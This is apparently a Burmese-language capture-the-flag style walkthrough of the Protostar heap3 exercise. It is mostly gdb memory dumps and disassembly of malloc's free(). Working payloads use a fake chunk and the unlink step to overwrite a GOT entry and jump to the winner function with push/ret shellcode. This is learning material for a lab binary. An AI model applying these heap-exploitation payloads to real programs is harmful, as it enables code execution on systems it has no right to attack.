0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804984a <free+38>:    and    eax,0xfffffffc
0x804984d <free+41>:    mov    DWORD PTR [ebp-0x30],eax
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x29     41
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804984a      3599    in common/malloc.c

ဟုတ္တယ္။ chunk size 😀 ဆက္မယ္

0x804984a <free+38>:    and    eax,0xfffffffc

eax ကို fffffffc နဲ႕ and လုပ္မယ္

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804984d <free+41>:    mov    DWORD PTR [ebp-0x30],eax
0x8049850 <free+44>:    mov    eax,DWORD PTR [ebp-0x38]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x28     40
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804984d      3599    in common/malloc.c

ebp-0x30 ေနရာမွာ eax ကို ျပန္ထားမယ္။

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049850 <free+44>:    mov    eax,DWORD PTR [ebp-0x38]
0x8049853 <free+47>:    mov    eax,DWORD PTR [eax]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x00000028      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x28     40
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3608    in common/malloc.c

ဒီေတာ့ chunk size နဲ႕ chunk အစကို stack မွာသိမ္းလိုက္တာေတြ႕ရျပီေပါ့ ။ ဒီလိုမ်ိဳးကိုယ့္ဘာကိုဆက္လုပ္ေစခ်င္ပါတယ္။ က်ေနာ္ဒီမွာမျပေတာ့ဘူး ။

0x8049850 <free+44>: mov eax,DWORD PTR [ebp-0x38] 0x38 ထဲက value ကို eax ထဲပို႕တယ္
0x8049853 <free+47>: mov eax,DWORD PTR [eax] eax ထဲကို eax point လုပ္ေနတဲ့ဟ value ထည့္တယ္

(gdb) x 0x804b160
0x804b160 <av_>: 0x00000049

0x8049855 <free+49>: cmp eax,DWORD PTR [ebp-0x30] ေစာေစာက သိမ္းထားခဲ့တဲ့ chunk size နဲ႕ compare လုပ္တယ္

0x49 က max bin chunk size ျဖစ္တယ္

ဒီနည္းနဲ႕ malloc ရဲ႕ chunk ေတြေနရာယူတာေတြေရာျပန္ေလ့လာလို႕ရတယ္

Ref

https://thesprawl.org/research/exploit-exercises-protostar-heap/#heap-3

Unlinking

0x8049899 <free+117>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x804989c <free+120>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size_flags
0x804989f <free+123>:   and    eax,0x2                  ; IS_MMAPPED
0x80498a2 <free+126>:   test   eax,eax                  ; check flag
0x80498a4 <free+128>:   jne    0x8049a2c <free+520>     ; jump if the flag is set
;------------------------------------------------------------------------------
0x80498aa <free+134>:   mov    eax,DWORD PTR [ebp-0x30] ; chunk_size
0x80498ad <free+137>:   mov    edx,DWORD PTR [ebp-0x34] ; chunk
0x80498b0 <free+140>:   lea    eax,[edx+eax*1]          ; next_chunk
0x80498b3 <free+143>:   mov    DWORD PTR [ebp-0x28],eax ; store next_chunk
0x80498b6 <free+146>:   mov    eax,DWORD PTR [ebp-0x28]
0x80498b9 <free+149>:   mov    eax,DWORD PTR [eax+0x4]  ; next_chunk_size_flags
0x80498bc <free+152>:   and    eax,0xfffffffc           ; zero last two flag bits
0x80498bf <free+155>:   mov    DWORD PTR [ebp-0x24],eax ; next_chunk_size
;------------------------------------------------------------------------------
0x80498c2 <free+158>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498c5 <free+161>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size
0x80498c8 <free+164>:   and    eax,0x1                  ; PREV_INUSE flag
0x80498cb <free+167>:   test   eax,eax                  ; check the flag
0x80498cd <free+169>:   jne    0x8049909 <free+229>     ; jump if the flag is set

သူရွင္းျပထားတာေကာင္းတယ္ ။ PREV_INUSE ျဖစ္ေနရင္ free+229 ကို ခုန္မယ္ ။

0x80498cf <free+171>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498d2 <free+174>:   mov    eax,DWORD PTR [eax]      ; prev_chunk_size
0x80498d4 <free+176>:   mov    DWORD PTR [ebp-0x1c],eax
0x80498d7 <free+179>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498da <free+182>:   add    DWORD PTR [ebp-0x30],eax ; chunk_size
0x80498dd <free+185>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498e0 <free+188>:   neg    eax                      ; -prev_chunk_size
0x80498e2 <free+190>:   add    DWORD PTR [ebp-0x34],eax ; prev_chunk = 
                                                        ; chunk+(-prev_chunk_size)
0x80498e5 <free+193>:   mov    eax,DWORD PTR [ebp-0x34] ; store prev_chunk
0x80498e8 <free+196>:   mov    eax,DWORD PTR [eax+0x8]  ; prev_chunk->fd
0x80498eb <free+199>:   mov    DWORD PTR [ebp-0x14],eax 
0x80498ee <free+202>:   mov    eax,DWORD PTR [ebp-0x34]
0x80498f1 <free+205>:   mov    eax,DWORD PTR [eax+0xc]  ; prev_chunk->bk
0x80498f4 <free+208>:   mov    DWORD PTR [ebp-0x18],eax

0x80498f7 <free+211>:   mov    eax,DWORD PTR [ebp-0x14] ; FD
0x80498fa <free+214>:   mov    edx,DWORD PTR [ebp-0x18] ; BK
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx  ; FD->bk = BK
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18] ; BK
0x8049903 <free+223>:   mov    edx,DWORD PTR [ebp-0x14] ; FD
0x8049906 <free+226>:   mov    DWORD PTR [eax+0x8],edx  ; BK->fk = FD

အဲ့လိုခုန္သြားရင္ unlink ကလုပ္ေတာ့မွာမဟုတ္ဘူး ။ prev_inuse မျဖစ္ေအာင္လုပ္မွ unlink ကိုလုပ္မွာျဖစ္တယ္။

ဒီေတာ့ အရင္ထက္နားလည္လာျပီ

ျပန္လုပ္ၾကည့္မယ္

(gdb) run AAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCC CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCC CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x43434343      0x00000000      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x2597100d      0x0fd6461d      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

အိုေက ဒီေတာ့ chunk size ကို ျပန္ျပီး overflow လုပ္မယ္။

ဟုတ္ျပီ chunk size က 64 bytes ထက္ၾကီးရမယ္ ။ ခုနကျမင္ျပီးသား အဲဒါနဲ႕ compare လုပ္သြားတယ္ဆိုတာကို

ေနာက္တစ္ခုက ေနာက္ဆံုး 2 bits ဟာ 00 နဲ႕ဆံုးရမယ္။

F0 , Bo အစရွိသျဖင့္ထည့္လို႕ရတယ္။

(gdb) r AAAA `python -c 'print "B"*32+"CCCC\xf0"'` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"CCCC\xf0"'` CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x43434343      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x55d35a6d      0x7f920c7d      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

ဒီေတာ့ ဟိုးအေပၚမွာေျပာခဲ့သလိုပဲ fake chunk အတြက္ Null byte ေတြမပါခ်င္ရင္ negative value ကိုျပန္သံုးရမယ္။

(gdb) r AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x2f0da0f1      0x054cf6e1      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      in heap3/heap3.c

ဟုတ္ျပီ free ကိုေပးလုပ္လိုက္ေတာ့မယ္။

(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18]
0xbffffc10:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc20:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc30:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc40:     0x00000000      0x00000000      0x00000f89      0xb7f09de0
0xbffffc50:     0x00000000      0x00000000      0xbffffc88      0x08048916
0xbffffc60:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
eax            0x0      0
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x0      0
0x080498fd in free (mem=0x804c058) at common/malloc.c:3638
3638    common/malloc.c: No such file or directory.
        in common/malloc.c

Segmentation Fault က အခုမွတက္တယ္။ unlink က အလုပ္လုပ္သြားျပီ။ FD နဲ႕ BK ကိုရွာရမယ္

(gdb) r AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCCDDDDEEEEFFFF
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA `python -c 'print "B"*32+"\xfc\xff\xff\xff\xf0"'` CCCCDDDDEEEEFFFF
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x44444444
0x804c060:      0x45454545      0x46464646      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc60:     0x0804c058      0xbffffe85      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
0xbffffc90:     0x00000004      0xbffffd34      0xbffffd48      0xb7fe1848
0xbffffca0:     0xbffffcf0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcb0:     0x00000001      0xbffffcf0      0xb7ff0626      0xb7fffab0
0xbffffcc0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcd0:     0xbffffd08      0x1182cc38      0x3bc39a28      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x11     17

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd34) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x44444444
0x804c060:      0x45454545      0x46464646      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18]
0xbffffc10:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc20:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc30:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc40:     0x45454545      0x44444444      0x00000f89      0xb7f09de0
0xbffffc50:     0x00000000      0x00000000      0xbffffc88      0x08048916
0xbffffc60:     0x0804c058      0xbffffe85      0x0804ab50      0xbffffc88
0xbffffc70:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc80:     0x0804ab50      0x00000000      0xbffffd08      0xb7eadc76
eax            0x44444444       1145324612
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x45454545       1162167621
0x080498fd in free (mem=0x804c058) at common/malloc.c:3638
3638    common/malloc.c: No such file or directory.
        in common/malloc.c

0x44444444 က BK

0x45454545 က FD

အေပၚမွာလုပ္ခဲ့တဲ့ GOT နဲ႕ heap ကိုျပန္ထည့္မယ္

(gdb) r `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x41414141      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x0804b11c
0x804c060:      0x0804c008      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0xbffffc40:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc68
0xbffffc50:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc60:     0x0804ab50      0x00000000      0xbffffce8      0xb7eadc76
0xbffffc70:     0x00000004      0xbffffd14      0xbffffd28      0xb7fe1848
0xbffffc80:     0xbffffcd0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffc90:     0x00000001      0xbffffcd0      0xb7ff0626      0xb7fffab0
0xbffffca0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcb0:     0xbffffce8      0x35b9df9a      0x1ff9498a      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xd      13

Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffffd14) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni

Program received signal SIGSEGV, Segmentation fault.
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x0804b11c      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0xfffffffc      0x000000f0      0x43434343      0x0804b11c
0x804c060:      0x0804c008      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049951 <free+301>:   mov    %edx,0xc(%eax)
0x8049954 <free+304>:   mov    -0x18(%ebp),%eax
0xbffffbf0:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc00:     0x0804b160      0x0804c054      0x000000ec      0x00000000
0xbffffc10:     0x0804c140      0x00000000      0x00000000      0xfffffffc
0xbffffc20:     0x00000000      0x00000000      0x00000f89      0xb7f09de0
0xbffffc30:     0x00000000      0x00000000      0xbffffc68      0x08048916
0xbffffc40:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc68
0xbffffc50:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc60:     0x0804ab50      0x00000000      0xbffffce8      0xb7eadc76
eax            0x0      0
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x0      0
0x08049951 in free (mem=0x804c058) at common/malloc.c:3648
3648    common/malloc.c: No such file or directory.
        in common/malloc.c
(gdb) x/12x 0x0804c008-8
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x0804b11c      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029
(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x0804c008

GOT ကို overwrite လုပ္တာအဆင္ေျပသြားျပီ ဒါေပမဲ့ မရေသးဘူး။ ျဖစ္ေနတယ္။

PREV_INUSE check ထားတာျဖစ္တယ္။ အဲဒါကို ေက်ာ္မွရမယ္။

0x8049933 <free+271>:   cmp    DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE
0x8049937 <free+275>:   jne    0x8049963 <free+319>     ; jump if the flag is set

အဲ့ေတာ့ Chunk A နဲ႕ B ၾကားထဲမွာကိုပဲ fake chunk တစ္ခုထပ္ထည့္မယ္။ အဲဒါအေပၚမွာေျပာထားခဲ့ျပီးျဖစ္ပါတယ္။ အဲ့တုန္းကစမ္းတာမရဘူး။

Failed Payload

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08"'`

အဓိကျပသနာကေတာ့ free လုပ္တဲ့အခ်ိန္မွာ chunk ေတြကဝင္ရွုပ္ကုန္သလိုျဖစ္သြားတယ္။

အခုဟာနဲ႕ ျပန္စမး္မယ္

winner function ကို execute လုပ္ဖို႕ေလးဒီမွာတစ္ခ်က္ေျပာမယ္။

Stack ရဲ႕ထိပ္ဆံုးကို ပစ္တင္ျပီး ret သံုးလိုက္ရင္ execute လုပ္သြားမွာပါ။

push 0x8048864
ret

Online Disassembler

https://defuse.ca/online-x86-assembler.htm#disassembly

"\x68\x64\x88\x04\x08\xC3"

ဒါကိုစမ္းၾကည့္မယ္။

`python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "B"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`

